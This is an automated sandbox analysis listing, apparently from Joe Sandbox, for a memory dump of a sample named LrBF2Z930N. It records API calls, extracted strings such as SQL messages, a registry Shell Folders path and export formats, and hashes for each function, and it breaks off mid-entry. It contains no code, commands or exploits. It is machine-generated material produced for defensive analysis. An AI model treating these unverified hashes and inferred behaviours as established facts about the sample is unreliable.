                                                                                      • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                      APIs
                                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy
                                                                                      • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                      • API String ID: 3510742995-2446657581
                                                                                      • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                      • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                      • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                      • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                      • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                      • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                      • memset.MSVCRT ref: 00405ABB
                                                                                      • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                      • SetFocus.USER32(?), ref: 00405B76
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$FocusItemmemset
                                                                                      • String ID:
                                                                                      • API String ID: 4281309102-0
                                                                                      • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                      • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                      • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                      • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _snwprintfwcscat
                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                      • API String ID: 384018552-4153097237
                                                                                      • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                      • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                      • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                      • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                      • String ID: 0$6
                                                                                      • API String ID: 2029023288-3849865405
                                                                                      • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                      • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                      • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                      • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                      APIs
                                                                                        • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                      • memset.MSVCRT ref: 00405455
                                                                                      • memset.MSVCRT ref: 0040546C
                                                                                      • memset.MSVCRT ref: 00405483
                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$memcpy$ErrorLast
                                                                                      • String ID: 6$\
                                                                                      • API String ID: 404372293-1284684873
                                                                                      • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                      • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                      • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                      • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                      APIs
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                      • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                      • wcscpy.MSVCRT ref: 0040A0D9
                                                                                      • wcscat.MSVCRT ref: 0040A0E6
                                                                                      • wcscat.MSVCRT ref: 0040A0F5
                                                                                      • wcscpy.MSVCRT ref: 0040A107
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                      • String ID:
                                                                                      • API String ID: 1331804452-0
                                                                                      • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                      • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                      • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                      • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                      APIs
                                                                                        • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                      • String ID: advapi32.dll
                                                                                      • API String ID: 2012295524-4050573280
                                                                                      • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                      • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                      • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                      • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                      APIs
                                                                                      Strings
                                                                                      • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                      • <%s>, xrefs: 004100A6
                                                                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$_snwprintf
                                                                                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                      • API String ID: 3473751417-2880344631
                                                                                      • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                      • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                      • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                      • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcscat$_snwprintfmemset
                                                                                      • String ID: %2.2X
                                                                                      • API String ID: 2521778956-791839006
                                                                                      • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                      • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                      • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                      • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _snwprintfwcscpy
                                                                                      • String ID: dialog_%d$general$menu_%d$strings
                                                                                      • API String ID: 999028693-502967061
                                                                                      • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                      • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                      • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                      • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                      APIs
                                                                                      • strlen.MSVCRT ref: 00408DFA
                                                                                        • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                      • memset.MSVCRT ref: 00408E46
                                                                                      • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                      • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$memsetstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 2350177629-0
                                                                                      • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                      • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                      • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                      • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset
                                                                                      • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                      • API String ID: 2221118986-1606337402
                                                                                      • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                      • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                      • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                      • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                      APIs
                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                      • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                      • memset.MSVCRT ref: 00408FD4
                                                                                      • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                      • memset.MSVCRT ref: 00409042
                                                                                      • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                        • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                      • String ID:
                                                                                      • API String ID: 265355444-0
                                                                                      • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                      • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                      • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                      • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                      APIs
                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                        • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                        • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                      • memset.MSVCRT ref: 0040C439
                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                      • _wcsupr.MSVCRT ref: 0040C481
                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                      • memset.MSVCRT ref: 0040C4D0
                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                      • String ID:
                                                                                      • API String ID: 4131475296-0
                                                                                      • Opcode ID: f8fc55ba245d1c9f6a3ba6cb2a4711690556c3657263a09b0baeb8372baa9e99
                                                                                      • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                      • Opcode Fuzzy Hash: f8fc55ba245d1c9f6a3ba6cb2a4711690556c3657263a09b0baeb8372baa9e99
                                                                                      • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004116FF
                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                        • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                      • API String ID: 2618321458-3614832568
                                                                                      • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                      • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                      • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                      • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFilefreememset
                                                                                      • String ID:
                                                                                      • API String ID: 2507021081-0
                                                                                      • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                      • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                      • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                      • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                      APIs
                                                                                      • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                      • malloc.MSVCRT ref: 00417524
                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                      • free.MSVCRT ref: 00417544
                                                                                      • free.MSVCRT ref: 00417562
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
